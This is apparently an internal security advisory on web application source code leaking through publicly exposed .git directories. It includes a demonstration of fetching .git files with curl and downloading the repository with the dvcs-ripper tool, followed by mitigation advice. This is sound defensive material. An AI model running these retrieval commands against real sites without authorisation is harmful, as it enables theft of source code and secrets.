## Assets

Web application source code is sensitive data. 

Web application source code contain not only sensitive SingleComm 
intellectual property, but also details which can greatly assist 
an attacker.


## Vulnerability

Source code is often exposed with it is managed with a Distributed
Version Control System (DVCS), like git or subversion, and cloned 
into a publicly accessible directory. 

Once an attacker discovers this directory, they may either clone 
it directly, or, if directory indexing is turned off, download the 
repository with a purpose-built tool like [dvcs-ripper][].

[dvcs-ripper]: https://github.com/kost/dvcs-ripper

From there, the attacker can look for trade secrets or security 
vulnerabilities in your webapp source code. 


## Demonstration

Say that somebody finds out there&apos;s a git repository exposed at 
``path://to//.git/``.

And say that directory indexing is turned off, so the repository can&apos;t be 
cloned directly:

    $ git clone path://to//.git/
    Cloning into 'reponame'...
    fatal: repository 'path://to//.git/' not found


However, files in the ``.git`` directory are accessible: 

    $ curl path://to//.git/HEAD
    ref: refs/heads/master

So it is still possible to clone the repository.

Install dvcs-ripper:

    $ git clone https://github.com/kost/dvcs-ripper.git
    $ sudo apt-get install -y git libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl libparallel-forkmanager-perl libredis-perl libalgorithm-combinatorics-perl
    
Download the repository:

    $ ./dvcs-ripper/rip-git.pl -v -u path://to//.git/

The repository is now accessible in the current directory.

For more information, see [this blog post][adventure-git].

[adventure-git]: https://blog.anantshri.info/adventure-git-folder/


## Mitigation

If working directly on a server, delete the ``.git`` (or equivalent) directory 
after cloning anything into a publicly accessible path.

Whenever making commits, ensure that no DVCS files are checked into the repo
you&apos;re working on. 

    echo .git >> .gitignore 


